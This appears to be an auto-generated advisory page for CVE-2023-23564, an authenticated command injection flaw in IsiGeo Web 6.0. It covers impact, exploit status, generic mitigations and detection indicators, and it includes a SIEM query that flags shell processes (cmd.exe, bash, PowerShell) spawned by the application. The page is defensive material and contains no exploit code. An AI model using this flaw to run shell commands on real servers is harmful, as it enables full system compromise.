Login Sign Up

CVE-2023-23564

8.8 HIGH
Remote Code Execution

📋 TL;DR

CVE-2023-23564 is a command injection vulnerability in Geomatika IsiGeo Web 6.0 that allows authenticated remote attackers to execute arbitrary commands on the server. This affects organizations using IsiGeo Web for geospatial data management. Attackers can gain full control of affected systems.

💻 Affected Systems

Products:
  • Geomatika IsiGeo Web
Versions: 6.0
Operating Systems: Windows, Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated access, but default installations are vulnerable. All deployments of version 6.0 are affected.

📦 What is this software?

Isigeo Web by Geomatika

View all CVEs affecting Isigeo Web →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise leading to data theft, ransomware deployment, lateral movement within the network, and persistent backdoor installation.

🟠

Likely Case

Unauthorized command execution leading to data exfiltration, service disruption, and potential privilege escalation to full system control.

🟢

If Mitigated

Limited impact with proper network segmentation, but authenticated users could still execute commands within application context.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Proof-of-concept exploit code is publicly available. Exploitation requires valid credentials but is straightforward once authenticated.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://www.geomatika.fr/isigeo-web/

Restart Required: No

Instructions:

Check vendor website for security updates. No official patch information available at this time.

🔧 Temporary Workarounds

Input Validation and Sanitization

all

Implement strict input validation and sanitization for all user inputs to prevent command injection

Network Segmentation

all

Isolate IsiGeo Web servers from critical systems and restrict outbound connections

🧯 If You Can't Patch

  • Implement strict network access controls to limit who can access the IsiGeo Web interface
  • Monitor for unusual command execution patterns and implement application-level firewalls

🔍 How to Verify

Check if Vulnerable:

Check if running IsiGeo Web version 6.0. Review application logs for command injection attempts.

Check Version:

Check application interface or configuration files for version information

Verify Fix Applied:

Test with known PoC after applying mitigations. Verify input validation prevents command execution.

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution patterns
  • Multiple failed authentication attempts followed by successful login and command execution
  • System commands executed from web application context

Network Indicators:

  • Outbound connections from IsiGeo Web server to unusual destinations
  • Unexpected network traffic patterns from application server

SIEM Query:

source="isigeo-web" AND (command="cmd.exe" OR command="/bin/bash" OR command="powershell")

📊 Metadata

CVE ID: CVE-2023-23564
CVSS v3 Score: 8.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-77
Published: August 22, 2023
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-23564, you might also want to check these:

CVE-2024-48841 10.0

This critical vulnerability in FLXEON software allows remote attackers to execute arbitrary code wit...

Same vulnerability type (CWE-77)
CVE-2025-59818 10.0

This vulnerability allows authenticated attackers to execute arbitrary system commands by manipulati...

Same vulnerability type (CWE-77)
CVE-2024-28354 10.0

This is a critical command injection vulnerability in TRENDnet TEW-827DRU routers that allows remote...

Same vulnerability type (CWE-77)